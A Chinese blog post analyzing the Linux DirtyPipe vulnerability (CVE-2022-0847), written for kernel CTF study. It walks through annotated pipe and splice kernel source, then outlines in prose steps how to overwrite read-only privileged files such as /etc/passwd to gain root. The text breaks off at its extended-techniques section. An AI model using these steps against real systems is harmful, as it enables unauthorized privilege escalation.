CVE-2022-0847 DirtyPipe漏洞分析及其延伸利用手法研究

0rb1t Lv2

0x00.前言

接触这个cve还是因为SCTF 2024中的一道kernel-pwn题:kno_puts_revenge,其中只给了一次的0x400堆的uaf机会,且仅泄露了堆地址。看了各路大佬的wp,可以说是利用手法多种多样,有直接打CVE-2022-26816的,也有打msg_msg的。最令我印象深刻的是利用DirtyPipe修改poweroff文件实现提权的,前面我只知道利用pipe_buffer打fops劫持,没想到居然还有0泄露如此美妙的打法,让我忍不住去分析这个打法的来源,并记录下来。

0x01.源码分析

本篇源码使用的是linux-5.15.1,且本段着重介绍pipe创建管道以及splice进行数据传输的流程,内容较为繁琐,可选择性跳过。

pipe

pipe(管道)是一种基本ipc机制,可用于进程间通信,传输数据,且管道的传输是单向的。它可以将一个进程的输出连接到另一个进程的输入,和linux的管道符如出一辙,或者说两者就是同一个东西。

用户层可通过pipe系统调用创建一个管道并获得两个文件描述符(读端和写端),或者通过pipe2在创建时设置flags。

1
2
3
4
5
6
7
8
/*
 * pipe() system call entry: forwards the user buffer to do_pipe2() with
 * flags fixed to 0.
 */
SYSCALL_DEFINE1(pipe, int __user *, fildes)
{
return do_pipe2(fildes, 0);
}
/*
 * pipe2() system call entry: same as pipe(), but passes the caller-supplied
 * flags through to do_pipe2().
 */
SYSCALL_DEFINE2(pipe2, int __user *, fildes, int, flags)
{
return do_pipe2(fildes, flags);
}

跟进到do_pipe2可以看到,其会调用__do_pipe_flags返回读管道和写管道的文件描述符。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/*
 * Shared implementation behind pipe() and pipe2().
 *
 * Obtains two descriptors and two struct file pointers from
 * __do_pipe_flags(), copies the descriptor pair out to the user buffer
 * fildes, and installs the files on success.
 *
 * Returns 0 on success, the error from __do_pipe_flags(), or -EFAULT when
 * the descriptors cannot be copied to user space.
 */
static int do_pipe2(int __user *fildes, int flags)
{
struct file *files[2];
int fd[2];
int error;

error = __do_pipe_flags(fd, files, flags);
if (!error) {
// If the fd pair cannot be copied out to user space, drop both files
// and give back both reserved descriptors.
if (unlikely(copy_to_user(fildes, fd, sizeof(fd)))) {
fput(files[0]);
fput(files[1]);
put_unused_fd(fd[0]);
put_unused_fd(fd[1]);
error = -EFAULT;
} else {
// Bind each file to its descriptor.
fd_install(fd[0], files[0]);
fd_install(fd[1], files[1]);
}
}
return error;
}

__do_pipe_flags函数会检查flags是否在设置的类型范围内,然后调用create_pipe_files创建两个pipe文件,并返回两个文件描述符。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
/*
 * Validate flags, create the two pipe files and reserve two descriptors.
 *
 * On success fd[0]/fd[1] hold the read/write descriptors, files[] holds the
 * files produced by create_pipe_files(), and 0 is returned. On failure a
 * negative error code is returned and anything acquired so far is released.
 */
static int __do_pipe_flags(int *fd, struct file **files, int flags)
{
int error;
int fdw, fdr;
// Reject any flag bit outside the supported set.
if (flags & ~(O_CLOEXEC | O_NONBLOCK | O_DIRECT | O_NOTIFICATION_PIPE))
return -EINVAL;

error = create_pipe_files(files, flags);
if (error)
return error;

// Reserve the descriptor for the read side.
error = get_unused_fd_flags(flags);
if (error < 0)
goto err_read_pipe;
fdr = error;

// Reserve the descriptor for the write side.
error = get_unused_fd_flags(flags);
if (error < 0)
goto err_fdr;
fdw = error;

audit_fd_pair(fdr, fdw);
fd[0] = fdr;
fd[1] = fdw;
return 0;

// Unwind in reverse order of acquisition.
err_fdr:
put_unused_fd(fdr);
err_read_pipe:
fput(files[0]);
fput(files[1]);
return error;
}

跟进create_pipe_files函数,通过get_pipe_inode获取管道对应的inode。

inode (index node)是指在许多“类Unix文件系统”中的一种数据结构,用于描述文件系统对象(包括文件、目录、设备文件、socket、管道等)。每个inode保存了文件系统对象数据的属性和磁盘块位置。 文件系统对象属性包含了各种元数据(如:最后修改时间) ,也包含用户组(owner)和权限数据。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/*
 * Create the two struct file objects of a pipe (excerpt; parts are elided
 * with "...").
 *
 * res[0] receives the read-only file and res[1] the write-only file; both
 * have private_data pointing at the same inode->i_pipe.
 * Returns 0 on success or the PTR_ERR() of the failed file allocation.
 */
int create_pipe_files(struct file **res, int flags)
{
// Obtain the inode that backs the pipe.
struct inode *inode = get_pipe_inode();
struct file *f;
int error;
...
// Allocate the write-only file, using pipefifo_fops as its file operations.
f = alloc_file_pseudo(inode, pipe_mnt, "",
O_WRONLY | (flags & (O_NONBLOCK | O_DIRECT)),
&pipefifo_fops);
if (IS_ERR(f)) {
free_pipe_info(inode->i_pipe);
iput(inode);
return PTR_ERR(f);
}
// Attach the pipe to the write-side file.
f->private_data = inode->i_pipe;
// Clone a read-only file from the write-side file.
res[0] = alloc_file_clone(f, O_RDONLY | (flags & O_NONBLOCK),
&pipefifo_fops);
if (IS_ERR(res[0])) {
put_pipe_info(inode, inode->i_pipe);
fput(f);
return PTR_ERR(res[0]);
}
// The read-side and write-side files share the same pipe.
res[0]->private_data = inode->i_pipe;
res[1] = f;
stream_open(inode, res[0]);
stream_open(inode, res[1]);
return 0;
}

get_pipe_inode调用alloc_pipe_info创建pipe结构体,并给其设置fops。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/*
 * Allocate the pseudo inode of a pipe and attach a fresh pipe_inode_info to
 * it (excerpt; error handling and the return statement are elided with
 * "...").
 */
static struct inode * get_pipe_inode(void)
{

struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb);
struct pipe_inode_info *pipe;
...
pipe = alloc_pipe_info();
// Make the inode carry the pipe.
inode->i_pipe = pipe;
// Number of files using this pipe.
pipe->files = 2;
// Start with one reader and one writer.
pipe->readers = pipe->writers = 1;
inode->i_fop = &pipefifo_fops;
...
}

alloc_pipe_info会申请一个pipe结构体,并为其bufs成员申请一个0x400大小的堆来存储16个pipe_buffer组成的循环表。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
/*
 * One slot of a pipe's buffer ring.
 */
struct pipe_buffer {
struct page *page;// the page this slot refers to
unsigned int offset, len;// offset: start of the data inside the page; len: number of data bytes in this slot
const struct pipe_buf_operations *ops;// operations table; the article notes it is a hijack target when attacker-controlled
unsigned int flags;// PIPE_BUF_FLAG_* bits, e.g. PIPE_BUF_FLAG_CAN_MERGE
unsigned long private;
};

/*
 * Allocate and initialise a pipe_inode_info together with its pipe_buffer
 * ring.
 *
 * Returns the new pipe, or NULL when an allocation fails or the hard
 * per-user limit check rejects the request; on failure the accounting is
 * reverted and the user reference is dropped.
 */
struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
// Default ring size (0x10 slots according to the article).
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
struct user_struct *user = get_current_user();
unsigned long user_bufs;
// NOTE(review): the article annotated this as 0x10*0x1000; the mainline
// default of pipe_max_size is believed to be 1 MiB - confirm in fs/pipe.c.
unsigned int max_size = READ_ONCE(pipe_max_size);
// Allocation of the pipe_inode_info itself; the article suggests this object
// can also be targeted (it assumes a 0x100-sized slab object - TODO confirm
// against sizeof(struct pipe_inode_info)).
pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
if (pipe == NULL)
goto out_free_uid;
// Shrink the ring when the default would exceed max_size and the caller
// lacks CAP_SYS_RESOURCE.
if (pipe_bufs * PAGE_SIZE > max_size && !capable(CAP_SYS_RESOURCE))
pipe_bufs = max_size >> PAGE_SHIFT;
// Charge pipe_bufs to the user; user_bufs is the value returned by the
// accounting helper (presumably the user's new total - confirm).
user_bufs = account_pipe_buffers(user, 0, pipe_bufs);
// Over the soft limit as an unprivileged user: fall back to
// PIPE_MIN_DEF_BUFFERS slots and re-account accordingly.
if (too_many_pipe_buffers_soft(user_bufs) && pipe_is_unprivileged_user()) {
user_bufs = account_pipe_buffers(user, pipe_bufs, PIPE_MIN_DEF_BUFFERS);
pipe_bufs = PIPE_MIN_DEF_BUFFERS;
}
// Over the hard limit: fail. As written this check is also gated by
// pipe_is_unprivileged_user(), so it applies to unprivileged users only.
if (too_many_pipe_buffers_hard(user_bufs) && pipe_is_unprivileged_user())
goto out_revert_acct;
// The buffer ring: pipe_bufs * sizeof(struct pipe_buffer) bytes, which the
// article places in the 0x400 slab class for the default ring size. kcalloc
// returns zeroed memory, so every slot starts with flags == 0.
pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);

if (pipe->bufs) {
init_waitqueue_head(&pipe->rd_wait);
init_waitqueue_head(&pipe->wr_wait);
pipe->r_counter = pipe->w_counter = 1;
pipe->max_usage = pipe_bufs;
pipe->ring_size = pipe_bufs;
pipe->nr_accounted = pipe_bufs;
pipe->user = user;
mutex_init(&pipe->mutex);
return pipe;
}

out_revert_acct:
// Undo the accounting charged above.
(void) account_pipe_buffers(user, pipe_bufs, 0);
kfree(pipe);
out_free_uid:
free_uid(user);
return NULL;
}

以上便是pipe的申请过程,可以看出来创建管道实则就是创建一个虚拟文件,往管道中写入和读取数据,实际就是往文件中读写,只是数据读取和写入都只发生到pipe_buffers也就是文件缓冲区,不会实际存入到硬盘文件中,在管道关闭后文件也不会保存。

pipe的fops如下

1
2
3
4
5
6
7
8
9
10
11
/*
 * File operations installed on pipe files (see create_pipe_files() and
 * get_pipe_inode()). Writes go through pipe_write and reads through
 * pipe_read; no .splice_read handler is set in this table.
 */
const struct file_operations pipefifo_fops = {
.open = fifo_open,
.llseek = no_llseek,
.read_iter = pipe_read,
.write_iter = pipe_write,
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
.splice_write = iter_file_splice_write,
};

当我们调用write往pipe中写入数据时会调用pipe_write函数处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
/*
 * write_iter handler for pipes (excerpt; parts are elided with "..." and
 * the tail of the function, including the end of the main loop and the
 * "out" label, is not shown).
 *
 * First tries to append the sub-page remainder of the write to the most
 * recently filled slot when that slot carries PIPE_BUF_FLAG_CAN_MERGE, then
 * loops inserting new page-sized slots until the data is consumed.
 */
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);
ssize_t chars;
bool was_empty = false;
bool wake_next_writer = false;
/* Null write succeeds. */
if (unlikely(total_len == 0))
return 0;

__pipe_lock(pipe);
// No reader left: raise SIGPIPE and fail with -EPIPE. (A freshly created
// pipe has one reader and one writer, see get_pipe_inode().)
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
ret = -EPIPE;
goto out;
}
...
head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
// Only attempt a merge when there is a sub-page remainder and the pipe
// already holds data.
if (chars && !was_empty) {
unsigned int mask = pipe->ring_size - 1;
// The most recently written slot.
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
int offset = buf->offset + buf->len;
// If the slot allows merging and the remainder still fits in its page,
// append directly after the slot's existing data.
if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
// Per the article, this call is a common control-flow hijack point when
// buf->ops is attacker-controlled, and confirm is normally NULL - confirm.
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;
// Copy the user data into the slot's existing page.
ret = copy_page_from_iter(buf->page, offset, chars, from);
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}

buf->len += ret;
if (!iov_iter_count(from))
goto out;
}
}

for (;;) {
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}

head = pipe->head;
// Ring not full: add a new slot.
if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[head & mask];
struct page *page = pipe->tmp_page;
int copied;

if (!page) {
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}

spin_lock_irq(&pipe->rd_wait.lock);

head = pipe->head;
// Re-check under the lock; if the ring is full now, go around the loop
// again.
if (pipe_full(head, pipe->tail, pipe->max_usage)) {
spin_unlock_irq(&pipe->rd_wait.lock);
continue;
}

pipe->head = head + 1;
spin_unlock_irq(&pipe->rd_wait.lock);

/* Insert it into the buffer array */
buf = &pipe->bufs[head & mask];
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;
// Non-packetized pipes get PIPE_BUF_FLAG_CAN_MERGE (per the article,
// is_packetized() is false when O_DIRECT is not set on the file).
if (is_packetized(filp))
buf->flags = PIPE_BUF_FLAG_PACKET;
else
buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
pipe->tmp_page = NULL;
// Copy up to one page of user data into the new slot.
copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
if (!ret)
ret = -EFAULT;
break;
}
ret += copied;
buf->offset = 0;
buf->len = copied;

if (!iov_iter_count(from))
break;
}

if (!pipe_full(head, pipe->tail, pipe->max_usage))
continue;

/* Wait for buffer space to become available. */
if (filp->f_flags & O_NONBLOCK) {
if (!ret)
ret = -EAGAIN;
break;
}
if (signal_pending(current)) {
if (!ret)
ret = -ERESTARTSYS;
break;
}

/*
* We're going to release the pipe lock and wait for more
* space. We wake up any readers if necessary, and then
* after waiting we need to re-check whether the pipe
* become empty while we dropped the lock.
*/
__pipe_unlock(pipe);
...
return ret;
}

可以知道当head_buf的flag设置为PIPE_BUF_FLAG_CAN_MERGE是可以接着该buf末尾写入数据的。

splice

当我们想要将一个文件中的内容传输到另一个文件中时,总需要先通过read将该文件的内容读取至内核空间再转入用户空间,然后通过write将其从用户空间复制到内核空间最终写入另一个文件中。

这样需要在内核和用户间进行大量的数据传输,效率非常低,所以开发者开发了splice功能,让数据只需要在内核空间传输即可实现文件之间内容的输送。

splice系统调用如下,获取fd结构体并调用__do_splice进行后续处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
 * splice() system call entry.
 *
 * Returns 0 for a zero length, -EINVAL for unknown flag bits, -EBADF when
 * either descriptor cannot be resolved, otherwise the result of
 * __do_splice().
 */
SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in,
int, fd_out, loff_t __user *, off_out,
size_t, len, unsigned int, flags)
{
struct fd in, out;
long error;

if (unlikely(!len))
return 0;

if (unlikely(flags & ~SPLICE_F_ALL))
return -EINVAL;

// Default result when a descriptor lookup fails.
error = -EBADF;
in = fdget(fd_in);
if (in.file) {
out = fdget(fd_out);
if (out.file) {
error = __do_splice(in.file, off_in, out.file, off_out,
len, flags);
fdput(out);
}
fdput(in);
}
return error;
}

__do_splice函数会获取infile和outfile的管道信息以及文件偏移,并调用do_splice处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/*
 * User-pointer front end of do_splice() (excerpt; the code after the
 * do_splice() call is elided with "...").
 *
 * Rejects an offset supplied for a pipe end with -ESPIPE, copies the
 * user-supplied offsets into kernel memory (-EFAULT on failure) and calls
 * do_splice() with kernel pointers.
 */
static long __do_splice(struct file *in, loff_t __user *off_in,
struct file *out, loff_t __user *off_out,
size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset, *__off_in = NULL, *__off_out = NULL;
long ret;
// Per the article, get_pipe_info() checks whether the file uses the pipe
// file operations and returns NULL otherwise.
ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
// A pipe end must not be given an offset.
if (ipipe && off_in)
return -ESPIPE;
if (opipe && off_out)
return -ESPIPE;

if (off_out) {
if (copy_from_user(&offset, off_out, sizeof(loff_t)))
return -EFAULT;
__off_out = &offset;
}
if (off_in) {
if (copy_from_user(&offset, off_in, sizeof(loff_t)))
return -EFAULT;
__off_in = &offset;
}

ret = do_splice(in, __off_in, out, __off_out, len, flags);
...
return ret;
}

do_splice则根据传输类型选择处理函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
/*
 * Dispatch a splice request according to which side is a pipe:
 * pipe -> pipe, pipe -> file, or file -> pipe.
 *
 * Returns the result of the selected helper, or a negative error code
 * (-EBADF, -ESPIPE, -EINVAL, or the rw_verify_area() error). Returns
 * -EINVAL when neither side is a pipe.
 */
long do_splice(struct file *in, loff_t *off_in, struct file *out,
loff_t *off_out, size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset;
long ret;
// The input must be open for reading and the output for writing.
if (unlikely(!(in->f_mode & FMODE_READ) ||
!(out->f_mode & FMODE_WRITE)))
return -EBADF;

ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
// Both files are pipes: pipe-to-pipe transfer.
if (ipipe && opipe) {
if (off_in || off_out)
return -ESPIPE;

/* Splicing to self would be fun, but... */
if (ipipe == opipe)
return -EINVAL;

if ((in->f_flags | out->f_flags) & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;
return splice_pipe_to_pipe(ipipe, opipe, len, flags);
}
// Pipe-to-file transfer.
if (ipipe) {
if (off_in)
return -ESPIPE;
if (off_out) {
// An explicit offset requires FMODE_PWRITE on the output file.
if (!(out->f_mode & FMODE_PWRITE))
return -EINVAL;
offset = *off_out;
} else {
offset = out->f_pos;
}
// Output files opened with O_APPEND are rejected.
if (unlikely(out->f_flags & O_APPEND))
return -EINVAL;
// Validate the write range starting at offset for len bytes.
ret = rw_verify_area(WRITE, out, &offset, len);
if (unlikely(ret < 0))
return ret;

if (in->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;

file_start_write(out);
// Write the pipe contents into the file.
ret = do_splice_from(ipipe, out, &offset, len, flags);
file_end_write(out);

// Store the advanced offset back where it came from.
if (!off_out)
out->f_pos = offset;
else
*off_out = offset;

return ret;
}
// File-to-pipe transfer.
if (opipe) {
if (off_out)
return -ESPIPE;
if (off_in) {
// An explicit offset requires FMODE_PREAD on the input file.
if (!(in->f_mode & FMODE_PREAD))
return -EINVAL;
offset = *off_in;
} else {
offset = in->f_pos;
}

if (out->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;

ret = splice_file_to_pipe(in, opipe, &offset, len, flags);
if (!off_in)
in->f_pos = offset;
else
*off_in = offset;

return ret;
}

return -EINVAL;
}

我们重点关注文件到管道的运输,splice_file_to_pipe函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/*
 * Splice from a file into the pipe opipe.
 *
 * Takes the pipe lock, waits for room via wait_for_space(), and on success
 * calls do_splice_to(). Pipe readers are woken when a positive value is
 * returned. Returns the helper's result.
 */
long splice_file_to_pipe(struct file *in,
struct pipe_inode_info *opipe,
loff_t *offset,
size_t len, unsigned int flags)
{
long ret;

pipe_lock(opipe);
ret = wait_for_space(opipe, flags);
if (!ret)
ret = do_splice_to(in, offset, opipe, len, flags);
pipe_unlock(opipe);
if (ret > 0)
wakeup_pipe_readers(opipe);
return ret;
}

跟进do_splice_to

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
 * Clamp the request to the free space of the pipe, validate the read range
 * and hand over to the input file's ->splice_read handler.
 *
 * Returns -EBADF when the file is not readable, the rw_verify_area() error,
 * the result of warn_unsupported() when no handler exists, otherwise the
 * handler's result.
 */
static long do_splice_to(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
unsigned int p_space;
int ret;
// The input file must be readable (checked again here).
if (unlikely(!(in->f_mode & FMODE_READ)))
return -EBADF;

/* Don't try to read more the pipe has space for. */
// Limit len to the number of free slots times the page size.
p_space = pipe->max_usage - pipe_occupancy(pipe->head, pipe->tail);
len = min_t(size_t, len, p_space << PAGE_SHIFT);

ret = rw_verify_area(READ, in, ppos, len);
if (unlikely(ret < 0))
return ret;

if (unlikely(len > MAX_RW_COUNT))
len = MAX_RW_COUNT;
// NOTE(review): the article says this ends up in ext4_file_read_iter for
// ext4 files; presumably that happens through a generic splice_read helper
// that invokes ->read_iter - confirm against ext4_file_operations.
if (unlikely(!in->f_op->splice_read))
return warn_unsupported(in, "read");
return in->f_op->splice_read(in, ppos, pipe, len, flags);
}

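ext4_file_read_iter(ext4的splice_read实际为generic_file_splice_read,它会构造一个pipe类型的iov_iter,再通过read_iter回调进入ext4_file_read_iter)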

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
/*
 * ext4 read_iter handler: picks the DAX, direct-I/O or generic page-cache
 * read path.
 *
 * Returns -EIO after a forced shutdown, 0 for an empty request, otherwise
 * the result of the selected read helper.
 */
static ssize_t ext4_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
{
struct inode *inode = file_inode(iocb->ki_filp);

if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
return -EIO;

if (!iov_iter_count(to))
return 0; /* skip atime */

#ifdef CONFIG_FS_DAX
if (IS_DAX(inode))
return ext4_dax_read_iter(iocb, to);
#endif
// Per the article, IOCB_DIRECT is normally not set on this path, so the
// generic page-cache read below is taken.
if (iocb->ki_flags & IOCB_DIRECT)
return ext4_dio_read_iter(iocb, to);

return generic_file_read_iter(iocb, to);
}

generic_file_read_iter函数则直接调用filemap_read函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
/*
 * Read from the page cache into iter (excerpt; parts are elided with
 * "...").
 *
 * Repeatedly fetches a batch of pages with filemap_get_pages() and passes
 * each one to copy_page_to_iter(). Returns already_read when it is
 * non-zero, otherwise the last error value.
 */
ssize_t filemap_read(struct kiocb *iocb, struct iov_iter *iter,
ssize_t already_read)
{
struct file *filp = iocb->ki_filp;
struct file_ra_state *ra = &filp->f_ra;
struct address_space *mapping = filp->f_mapping;
struct inode *inode = mapping->host;
struct pagevec pvec;
int i, error = 0;
bool writably_mapped;
loff_t isize, end_offset;
...

do {
cond_resched();
// Fetch the next batch of pages into pvec (at most 15 pages per batch
// according to the article).
error = filemap_get_pages(iocb, iter, &pvec);
if (error < 0)
break;

...

for (i = 0; i < pagevec_count(&pvec); i++) {
struct page *page = pvec.pages[i];
size_t page_size = thp_size(page);
size_t offset = iocb->ki_pos & (page_size - 1);
size_t bytes = min_t(loff_t, end_offset - iocb->ki_pos,
page_size - offset);
size_t copied;
...
// Key step: hand the page to the iterator.
copied = copy_page_to_iter(page, offset, bytes, iter);

already_read += copied;
iocb->ki_pos += copied;
ra->prev_pos = iocb->ki_pos;

if (copied < bytes) {
error = -EFAULT;
break;
}
}
put_pages:
// Drop the reference held on every page of the batch.
for (i = 0; i < pagevec_count(&pvec); i++)
put_page(pvec.pages[i]);
pagevec_reinit(&pvec);
// Keep going while the iterator still has room; for a pipe iterator the
// remaining count is updated inside copy_page_to_iter_pipe().
} while (iov_iter_count(iter) && iocb->ki_pos < isize && !error);

file_accessed(filp);

return already_read ? already_read : error;
}

其中filemap_get_pages->filemap_get_read_batch对filemap进行遍历,取出n个page并返回,这里采用的零拷贝技术,只将page指针传过来,并引用计数加一。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
/*
 * Collect a batch of page-cache pages into pvec, walking mapping->i_pages
 * from index and stopping once the walk passes max.
 *
 * Each page added to pvec has had a reference taken with
 * page_cache_get_speculative(); no page data is copied here.
 */
static void filemap_get_read_batch(struct address_space *mapping,
pgoff_t index, pgoff_t max, struct pagevec *pvec)
{
XA_STATE(xas, &mapping->i_pages, index);
struct page *head;

rcu_read_lock();
// Walk the entries of i_pages starting at index.
for (head = xas_load(&xas); head; head = xas_next(&xas)) {
if (xas_retry(&xas, head))
continue;
if (xas.xa_index > max || xa_is_value(head))
break;
// Take a reference so the page cannot be freed while in use.
if (!page_cache_get_speculative(head))
goto retry;

/* Has the page moved or been split? */
// Second look-up: make sure the entry did not change while the reference
// was being taken.
if (unlikely(head != xas_reload(&xas)))
goto put_page;
// Add the page to pvec; stop when pagevec_add() reports no room left.
if (!pagevec_add(pvec, head))
break;
// Stop the batch after a page that is not up to date (a check, not an
// update of the page state).
if (!PageUptodate(head))
break;
if (PageReadahead(head))
break;
xas.xa_index = head->index + thp_nr_pages(head) - 1;
xas.xa_offset = (xas.xa_index >> xas.xa_shift) & XA_CHUNK_MASK;
continue;
// Drop the reference taken above, then retry the look-up.
put_page:
put_page(head);
retry:
xas_reset(&xas);
}
rcu_read_unlock();
}

当iter为管道类型时,copy_page_to_iter函数会调用copy_page_to_iter_pipe函数进行处理。

可以看到copy_page_to_iter_pipe函数是直接将page指针传给pipe_buffer的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
/*
 * "Copy" a page into a pipe-backed iov_iter by reference (excerpt; parts
 * are elided with "...").
 *
 * No data is copied: a pipe_buffer slot is pointed at page, with an extra
 * page reference taken via get_page(). Returns bytes on success, or 0 when
 * the pipe is full.
 */
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe;
struct pipe_buffer *buf;
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head = i->head;
size_t off;
...
off = i->iov_offset;
buf = &pipe->bufs[i_head & p_mask];
if (off) {
if (offset == off && buf->page == page) {
/* merge with the last one */
buf->len += bytes;
i->iov_offset += bytes;
goto out;
}
i_head++;
buf = &pipe->bufs[i_head & p_mask];
}
if (pipe_full(i_head, p_tail, pipe->max_usage))
return 0;

buf->ops = &page_cache_pipe_buf_ops;
get_page(page);
// The slot receives the page pointer itself; nothing is copied.
buf->page = page;
buf->offset = offset;
buf->len = bytes;
// NOTE: buf->flags is not assigned in the visible code, so the slot keeps
// whatever flags value it held before; the article identifies this as the
// root cause of CVE-2022-0847.
pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;
out:
// Consume bytes from the iterator's remaining count.
i->count -= bytes;
return bytes;
}

综上,splice系统调用的主要作用就是进行pipe与文件之间的传输,当从文件传输数据到pipe时,是基于零拷贝实现的,直接将文件的page传输给pipe,然后将page的引用计数+1,而pipe对page的操作是基于buf->flags参数的,倘若buf->flags参数为之前分析的PIPE_BUF_FLAG_CAN_MERGE,就可以往page中写内容。

0x02.漏洞原理

根据前面的源码分析,我们大致了解了pipe以及splice的功能。

我们可以看到,在copy_page_to_iter_pipe函数中,buf->flags并未进行初始化。

所以如果我们能喷射大量的相同大小堆块,在buf->flags位置设置成PIPE_BUF_FLAG_CAN_MERGE,并将堆块释放。

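当调用pipe创建pipe_buffers时,buf->flags参数会默认为PIPE_BUF_FLAG_CAN_MERGE,从而我们再次调用splice_file_to_pipe触发copy_page_to_iter_pipe将只读文件的page传给pipe,此时pipe的buf->flags仍未初始化,保留着PIPE_BUF_FLAG_CAN_MERGE。(注意:上文alloc_pipe_info中pipe->bufs是通过kcalloc申请的,申请时内存会被清零,因此单纯依靠堆喷残留的flags值会被清掉;实际利用应采用下文Function.2中先写满再读空pipe的方式来置位flags。)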

由于内核在实现对只读文件的映射时,并不会将映射的page设置成只读权限,所以我们可以利用pipe往page中写入数据从而修改文件内容。

0x03.漏洞利用

知道了原理,利用起来就很简单了。

Function.1

Step.1

喷射n个同样大小的堆块,修改其每个buf的flags标志为PIPE_BUF_FLAG_CAN_MERGE,再全部释放。

Step.2

创建一个新pipe,并打开一个特权只读文件。

Step.3

调用splice,将文件数据传给pipe。

Step.4

往pipe中写入数据,然后关闭pipe和文件。

由此特权文件成功被写入数据,我们可以修改/etc/passwd实现提权。

Function.2

看了别的佬的利用发现其实可以不喷射完成利用。

Step.1

创建一个pipe,打开一个特权只读文件。

Step.2

往pipe中写满数据,此时所有的pipe_buffer的flags位都设置为PIPE_BUF_FLAG_CAN_MERGE,再将pipe所有数据都读出来,这样天然情况下所有的pipe_buffer->flags就全部置位完成了。

剩下步骤就是和Function.1一样了。

0x04.延伸利用手法

当该漏洞修复后,我们就没法直接利用了。

